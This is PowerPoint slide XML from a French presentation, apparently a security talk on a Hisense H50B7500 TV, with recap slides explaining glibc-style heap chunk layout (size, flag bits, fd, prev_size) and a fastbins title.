              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196827" y="4152900"/>
            <a:ext cx="3591598" cy="67768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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349892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5EB5C90-9970-C8D3-4020-D1B7B4484885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFFDC1B2-126E-C60F-AD3C-04C754F666D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77B284E7-2482-91EE-29DD-1F974DCBDCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D2B1A2A-B54D-C8F9-4725-B0DC0D50C27D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3196341" y="1840017"/>
            <a:ext cx="393509"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9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7CD60E-83ED-CA7B-C489-75EFAC3948F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1060149" y="2263681"/>
            <a:ext cx="2529700" cy="16659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User data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{878A5BFA-E1B9-F2E6-71AA-F8FCCD8B14A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1060149" y="1840017"/>
            <a:ext cx="1338775"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11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7491CB85-8D3A-62D5-CAAF-F524BC8C767D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2792433" y="1840017"/>
            <a:ext cx="403908"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12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A4ACFC7-76C6-55CF-A4CE-B0E8FD4D4294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2398924" y="1840017"/>
            <a:ext cx="393509"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13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369E5F42-6D2E-676F-AE1B-0011D971BA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306724" y="1539935"/>
            <a:ext cx="2036550" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> alloué</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="ZoneTexte 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EF2A59-68D1-F7D8-73FA-7B84614B5D30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5700324" y="1543745"/>
            <a:ext cx="2036550" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> libre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4E4592-48EC-D10C-96A7-294976CB5751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5453749" y="2262719"/>
            <a:ext cx="2529700"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20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66993BEF-1EAC-53B3-F769-9EDF6CF8D89A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5453749" y="2686383"/>
            <a:ext cx="2529700" cy="8195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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connecteur droit avec flèche 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA886C3D-4750-C438-2080-F74D7F61C7A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772117" y="1840017"/>
            <a:ext cx="0" cy="208959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74CE7489-F231-CB67-5767-6073EAAA5705}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116797" y="2748403"/>
            <a:ext cx="655319" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="ZoneTexte 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C452CF2-9981-FC2B-0E26-41D1CED2F8BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060148" y="3995486"/>
            <a:ext cx="2529701" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>A – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Allocated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Arena</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>M – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Mmap’d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>P – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="ZoneTexte 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49076709-FD28-44DC-F775-D5AED094E3FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453749" y="3992256"/>
            <a:ext cx="2529701" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E0C193-F392-9CAB-2603-E8DAC1C017BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7589941" y="1843827"/>
            <a:ext cx="393509"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29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19A2FAE-65F9-B912-9006-FE850AB76D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5453749" y="1843827"/>
            <a:ext cx="1338775"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30" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7988F3CA-89D6-9A40-96A8-F8333F317F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7186033" y="1843827"/>
            <a:ext cx="403908"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31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52281DC2-DFE6-B080-DE78-4C09D99DA8A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6792524" y="1843827"/>
            <a:ext cx="393509"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32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CA60F1-76C7-F3BC-5572-9BAA4F19FA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5453749" y="3505949"/>
            <a:ext cx="2529700"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prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D07EA2-A0D9-6B99-3830-2518D6ABECCD}"/>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34" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7973CF-6999-5BB1-E2A9-90491E20B2E7}"/>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Rappels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="ZoneTexte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA37844-AC13-3CFA-1BD8-4D9EBD4381A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1195202"/>
            <a:ext cx="7153800" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sur les architectures 32 bits les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> sont alignés sur 8 octets </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3011272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a:t>Le produit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé de la date 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé du texte 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le produit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28B73D6-6C21-AFF7-43BE-6D0DA0116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1" r="17713" b="51050"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089775" y="1477520"/>
            <a:ext cx="3952125" cy="2523930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B980F97-1C21-06B2-DE58-EF9D93C0A0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52" r="12664" b="12267"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362337" y="1272830"/>
            <a:ext cx="1481393" cy="1720940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Image 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CEE0FBE-AA48-2C1C-7016-1387B798E0B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6433034" y="3318403"/>
            <a:ext cx="1481394" cy="1212408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="ZoneTexte 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D2B567D-F26A-47B3-C0DF-FC833EA2A185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089775" y="4001450"/>
            <a:ext cx="3952125" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hisense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – H50B7500</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2658281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9D7CC85-5ED5-F1B9-E023-7F92E7C79C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342C83BD-620D-0123-D4D0-4902E59D94BB}"/>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994DB4F8-692D-6637-21F8-AAEB6142259A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
